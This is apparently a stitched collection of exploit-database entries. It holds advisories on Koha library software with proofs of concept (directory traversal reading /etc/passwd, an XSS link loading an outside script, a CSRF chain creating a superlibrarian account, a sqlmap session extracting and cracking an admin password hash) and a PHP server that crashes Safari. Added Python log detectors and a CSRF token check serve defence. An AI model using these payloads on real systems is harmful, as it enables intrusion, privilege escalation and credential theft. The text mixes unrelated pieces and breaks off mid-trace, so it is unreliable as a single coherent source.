* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4632

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search 

#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
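To spot this kind of traversal in web server logs, decode the parameter values (the PoCs above use %2f for the slash, and attackers also double-encode) and look for a bare ".." path segment rather than the literal string "..", which would also flag harmless values. As an added example that is not part of the advisory or of Koha, the Python below runs that check over a few constructed Apache log lines built from the PoC URLs; the log lines, IP addresses and timestamps are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines: the two advisory PoCs (one of them
# double-encoded), a normal template_path request and a benign query that
# merely contains two dots. Not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jun/2015:10:01:02 +0200] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1832 "-" "curl/7.38.0"
203.0.113.5 - - [25/Jun/2015:10:01:03 +0200] "GET /cgi-bin/koha/svc/members/search?template_path=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1832 "-" "curl/7.38.0"
198.51.100.7 - - [25/Jun/2015:10:02:10 +0200] "GET /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt&term=smith HTTP/1.1" 200 944 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jun/2015:10:02:11 +0200] "GET /cgi-bin/koha/opac-search.pl?q=a..b&idx=kw HTTP/1.1" 200 5012 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %252e%252e%252f is seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value: str) -> bool:
    """True when any path segment of the decoded value is '..'.
    Splitting on separators avoids false positives on values like 'a..b'."""
    normalised = fully_decode(value).replace("\\", "/")
    return any(segment == ".." for segment in normalised.split("/"))


def find_traversal_attempts(log_text: str) -> list:
    """Return (ip, path, parameter, decoded value) for every request whose
    path or any query parameter contains a traversal. parse_qsl decodes
    once; fully_decode then strips any further encoding layers."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if is_traversal(url.path):
            hits.append((m.group("ip"), url.path, "<path>", fully_decode(url.path)))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if is_traversal(value):
                hits.append((m.group("ip"), url.path, name, fully_decode(value)))
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

Both PoC lines are reported with their decoded payloads, the legitimate template name and the "a..b" search term are not. A status of 200 on such a request, as in the sample, is the signal to treat it as a successful read rather than a probe.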
            
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4630, CVE-2015-4631


### CVE-2015-4631 ### 

#### Title: ####
Multiple XSS and XSRF vulnerabilities in Koha 

#### Type of vulnerability: ####
Koha suffers from multiple critical XSS and XSRF vulnerabilities

##### Exploitation vector:
The attack can be carried out from a compromised user account (for example after retrieving a student user's password through the SQL injection CVE-2015-4633) or by a user who clicks a malicious link (in a phishing mail, a forum post, etc.).

##### Attack outcome:
1. An attacker may escalate privileges and even gain superlibrarian permissions.
2. An attacker may target other users by stealing session tokens, impersonating them, or exploiting browser vulnerabilities to gain access to their machines.
3. Perform unauthorized actions with the permissions of a staff member.
4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the web server.

#### Impact: ####
critical (scale: low, medium, high, critical)

#### Software/Product name: ####
Koha
 
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4631

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The application also lacks challenge (anti-CSRF) tokens that would prevent cross-site request forgery. This allows remote attackers to inject arbitrary web script or HTML and completely compromise the site. 

The following pages are affected by stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected by reflected XSS flaws:

/cgi-bin/koha/opac-shelves.pl 				(parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl 				(parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl 		(parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl 			(parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl 	(parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl		(parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl			(parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl			(parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl 			(parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")

#### Proof-of-concept: ####
Attack scenario:

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads a forum post) and clicks the following link:

http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, the library admin, notices the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malicious code is executed. The code can then perform any unauthorized action with the permissions of user Bob. For example:

Create a new user:

http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibrarian permission:

http://testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log in as superlibrarian.

Side note: for the attack to work, Alice needs to be logged in to the Open Public Catalog (OPAC) interface at the time she clicks the malicious link, and she needs access to the OPAC interface and permission to create public lists.
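The escalation chain works because memberentry.pl and member-flags.pl accept state-changing requests by plain GET without any token that the injected script could not supply. As an added example that is not part of the advisory or of Koha's code, the Python below shows the gate that breaks the chain: a per-session HMAC-based CSRF token verified in constant time, plus refusal of state changes over GET. SERVER_SECRET, the operation names in MUTATING_OPS and the session identifiers are assumptions of this example.

```python
import hashlib
import hmac
import secrets

# Server-side secret; a real deployment loads it from configuration, not source.
# Fixed here (constructed) so the example is deterministic.
SERVER_SECRET = bytes.fromhex(
    "9f1c5b2a7e4d3c8b6a5f4e3d2c1b0a99887766554433221100ffeeddccbbaa99")

# Staff operations that change state; the advisory's chain drives both of them
# with plain GET requests issued from the injected script. Names are assumed.
MUTATING_OPS = {"members/memberentry.pl", "members/member-flags.pl"}


def csrf_token(session_id: str) -> str:
    """Per-session token: HMAC(secret, session id). A script running in another
    user's context (Alice's payload in Bob's browser) cannot compute it because
    it knows neither the secret nor, given HttpOnly cookies, Bob's session id,
    and the token stops being valid when the session ends."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def valid_csrf_token(session_id: str, presented: str) -> bool:
    # Constant-time comparison so the check does not leak matching prefixes.
    return hmac.compare_digest(csrf_token(session_id), presented or "")


def authorize_mutation(op: str, method: str, session_id: str,
                       presented_token: str) -> tuple:
    """Gate a state-changing staff operation. Returns (allowed, reason).
    Read-only operations pass untouched; mutating ones must arrive by POST
    and carry the session's token in the form body."""
    if op not in MUTATING_OPS:
        return True, "ok"
    if method.upper() != "POST":
        return False, "state change via GET refused"
    if not valid_csrf_token(session_id, presented_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"


if __name__ == "__main__":
    bob = secrets.token_hex(16)            # Bob's session id (assumed)
    tok = csrf_token(bob)
    # The request the advisory's payload would fire from Bob's browser: GET, no token.
    print(authorize_mutation("members/member-flags.pl", "GET", bob, ""))
    # A legitimate form submission from the staff interface.
    print(authorize_mutation("members/member-flags.pl", "POST", bob, tok))
```

The token must be embedded in the staff pages' forms, not readable from a cookie, otherwise the same-origin script could simply copy it; with that in place the stored XSS still runs, but can no longer turn into a superlibrarian account on its own.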

   
            
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4633




### CVE-2015-4633 ### 

#### Title: ####
Unauthenticated SQL Injection in Koha

#### Type of vulnerability: ####
An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database. 

#### Exploitation vector: ####
The URL parameter 'number' of /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQL injection.

#### Attack outcome: ####
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read and write access to the filesystem may be possible.

#### Impact: ####
critical

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4633

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` first contact with the release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References: ####
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.

#### Proof-of-concept: ####
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we need to execute an SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org

   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

   [*] starting at 09:20:07

   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed the hash to John the Ripper and get lucky

   root@kali:/home/wicked# echo '$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS' > ./admin-pass
   root@kali:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@kali:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left


4. Log in with username "admin" and password "admin" ;)
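As an added example that is not part of the advisory, the following Python script reviews web-server access logs for the two request shapes this page describes: time-based blind payloads in the 'number' parameter of opac-tags_subject.pl (the sqlmap run above used PROCEDURE ANALYSE with BENCHMARK) and HTML markup in the 'addshelf' value passed to opac-shelves.pl. The log lines, client IPs and the example.invalid host are constructed; only the first injected value is the payload sqlmap reported.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined-format request line; enough to pull out client IP and target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Markers of MySQL time-based blind payloads: the advisory's sqlmap run used
# PROCEDURE ANALYSE + BENCHMARK(); a bare SLEEP() is the other common form.
TIME_BASED_RE = re.compile(r'\b(?:BENCHMARK|SLEEP)\s*\(|\bPROCEDURE\s+ANALYSE\b', re.IGNORECASE)
# Any HTML tag in a list name: the opac-shelves.pl 'addshelf' value is stored and
# later rendered in the staff interface.
HTML_TAG_RE = re.compile(r'<\s*/?\s*[a-z][^>]*>', re.IGNORECASE)

# Constructed sample log (not from the advisory). The legitimate request passes a
# plain integer, as in the sqlmap command line above (number=10).
SAMPLE_LOG = r"""
10.0.0.5 - - [25/Jun/2015:09:20:07 +0200] "GET /cgi-bin/koha/opac-tags_subject.pl?number=10 HTTP/1.1" 200 512
10.0.0.5 - - [25/Jun/2015:09:20:09 +0200] "GET /cgi-bin/koha/opac-tags_subject.pl?number=1%20PROCEDURE%20ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) HTTP/1.1" 200 512
10.0.0.7 - - [25/Jun/2015:09:21:00 +0200] "GET /cgi-bin/koha/opac-tags_subject.pl?number=1%20AND%20SLEEP(5) HTTP/1.1" 200 512
10.0.0.9 - - [25/Jun/2015:09:22:00 +0200] "GET /cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+%3Cscript+src%3D%27http%3A%2F%2Fexample.invalid%2Fx.js%27%2F%3E&sortfield=title HTTP/1.1" 302 0
10.0.0.9 - - [25/Jun/2015:09:23:00 +0200] "GET /cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Summer+Reading&sortfield=title HTTP/1.1" 302 0
"""


def _first(qs, key):
    return qs.get(key, [None])[0]


def inspect_request(ip, target):
    """Return a list of findings for one request target (path + query string)."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    findings = []
    if parts.path.endswith('/opac-tags_subject.pl'):
        number = _first(qs, 'number')
        # Anything but an integer is worth a look; the time-based markers make
        # it a clear injection attempt rather than a broken client.
        if number is not None and not number.isdigit():
            rule = 'time-based-sqli' if TIME_BASED_RE.search(number) else 'non-numeric-number'
            findings.append({'ip': ip, 'rule': rule, 'value': number})
    if parts.path.endswith('/opac-shelves.pl'):
        name = _first(qs, 'addshelf')
        if name and HTML_TAG_RE.search(name):
            findings.append({'ip': ip, 'rule': 'html-in-list-name', 'value': name})
    return findings


def scan_log(text):
    """Run inspect_request over every parseable line of an access log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings.extend(inspect_request(m['ip'], m['target']))
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print('%-10s %-20s %s' % (f['ip'], f['rule'], f['value'][:60]))
```

Matching on the decoded parameter value rather than the raw URL matters here: sqlmap's payload arrives percent-encoded, so a pattern applied to the raw request line would miss the space between PROCEDURE and ANALYSE.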










### CVE-2015-xxxx ### 

#### Title: ####
Unauthenticated SQL Injection

#### Type of vulnerability: ####
SQL Injection vulnerabilities in the Koha staff client allow attackers to read arbitrary data from the database. 

#### Exploitation vector: ####
The URL parameter 'number' of /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQL injection.

#### Attack outcome: ####
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read and write access to the filesystem is possible.

#### Impact: ####
critical

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-xxxx

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` first contact with the release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References: ####
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.

#### Proof-of-concept: ####
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
            
#!/usr/bin/php
<?php
# Title          :  Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept
# Product Website:  https://www.apple.com/safari/
# Author         :  Mohammad Reza Espargham
# Linkedin       :  https://ir.linkedin.com/in/rezasp
# E-Mail         :  me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website        :  www.reza.es
# Twitter        :  https://twitter.com/rezesp
# FaceBook       :  https://www.facebook.com/mohammadreza.espargham



# Usage :
# php poc.php
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)

#Main POC Code
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
// Let the PoC be restarted right away instead of waiting for TIME_WAIT to expire
socket_set_option($reza, SOL_SOCKET, SO_REUSEADDR, 1);
socket_bind($reza, '0.0.0.0', 8080) or die('Failed to bind port 8080!');
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
// Base64 of a small HTML page: an <svg viewBox="1 2 500 500"> styled with
// "padding-top: 1394%; box-sizing: border-box;" that contains one
// <polyline points="1 1,2 2">. The oversized padding is what trips the
// CoreGraphics assertion shown in the crash report below.
$msg = 'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd = base64_decode($msg);
for (;;) {
    if ($client = @socket_accept($reza)) {
        // Minimal HTTP/1.1 response; the explicit length lets the browser render at once
        socket_write($client, "HTTP/1.1 200 OK\r\n" .
            "Content-Length: " . strlen($msgd) . "\r\n" .
            "Content-Type: text/html; charset=UTF-8\r\n" .
            "Connection: close\r\n\r\n" .
            $msgd);
        socket_close($client); // the original never closed the client socket
    } else {
        usleep(100000);
    }
}





#Crash Report
/*

Process Model:
Multiple Web Processes


Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib        	0x00007fff8e628286 __pthread_kill + 10
1   libsystem_c.dylib             	0x00007fff90619b53 abort + 129
2   libsystem_c.dylib             	0x00007fff905e1c39 __assert_rtn + 321
3   com.apple.CoreGraphics        	0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242
4   com.apple.CoreGraphics        	0x00007fff8773aff0 CGContextAddPath + 93
5   com.apple.WebCore             	0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6   com.apple.WebCore             	0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
7   com.apple.WebCore             	0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
8   com.apple.WebCore             	0x000000010597f3c3 WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9   com.apple.WebCore             	0x0000000104fa73cb WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
10  com.apple.WebCore             	0x0000000104fa7062 WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1330
11  com.apple.WebCore             	0x0000000104f1ee72 WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
12  com.apple.WebCore             	0x0000000105429e88 WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
13  com.apple.WebCore             	0x0000000104ea4a63 WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14  com.apple.WebCore             	0x0000000104ea4509 WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15  com.apple.WebCore             	0x0000000104e53d96 WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16  com.apple.WebCore             	0x0000000104e51373 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
17  com.apple.WebCore             	0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
18  com.apple.WebCore             	0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
19  com.apple.WebCore             	0x00000001058db139 WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
20  com.apple.WebCore             	0x0000000104e51478 WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21  com.apple.WebCore             	0x0000000104e51420 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
22  com.apple.WebCore             	0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
23  com.apple.WebCore             	0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
24  com.apple.WebCore             	0x0000000104e512b2 WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
